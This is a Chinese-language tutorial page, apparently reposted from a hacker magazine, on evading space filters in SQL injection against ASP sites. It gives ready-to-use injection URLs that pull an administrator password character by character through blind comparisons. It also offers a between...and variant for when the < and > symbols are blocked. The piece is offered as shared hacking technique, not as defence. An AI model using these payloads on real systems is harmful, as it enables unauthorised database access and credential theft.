当前位置: 首页 > 图文教程 > 网络编程 > ASP > 突破空格的限制

ASP
关于释放session的两篇文章(一)
关于释放session的两篇文章(二)
表单填写时用回车代替TAB的实现方式
DateDiff的用法
加快DHTML的一组技巧
全面考察“禁用浏览器后退按钮”
XML加ASP实现网页“本地化”
透过ASP修改NT使用者的密码
方便购买的电子商务站点设计技巧
使用ASPMail组件发送数字卡片
聊天室关键技术[用户断线]处理
生成类似Windows资源管理器
如何将代码生成的文件设为只读
ASP中巧用存储过程
拦截表单的另外一种写法
ASP实现OICQ式的信息收发功能
怎样用HtmlEncode显示Unicode?
ASP出错集成处理
ASP.NET中处理datetime的一些通用函数
ASP.NET实现HTTP方式获取功能

ASP 中的 突破空格的限制


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 245 ::
收藏到网摘: n/a

关于空格,有许多替换方式,比如TAB空格,SQL数据库中的/**/,但我又找到了另一种替换方式,已发表于《黑客手册》2006.7期中,这里挑其精华,现一下吧!
对于SQL语句,大家还都习惯于其的空格,比如select id from [name],如果中间没有了空格,那就成了selectidfrom[name], 一滩糊涂!除了上面所说到几个空格的替代方法外,我发现用()括号在SQL中一样可以运行,比如上面的语句,就可以写成,select(id)from[name],有括号分隔,可以正常执行。
举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其实可以写成这样的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了<和>符号,则用between…and…,语句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
呵呵,总结一下,和LOVESHELL上的朋友分享一下。 '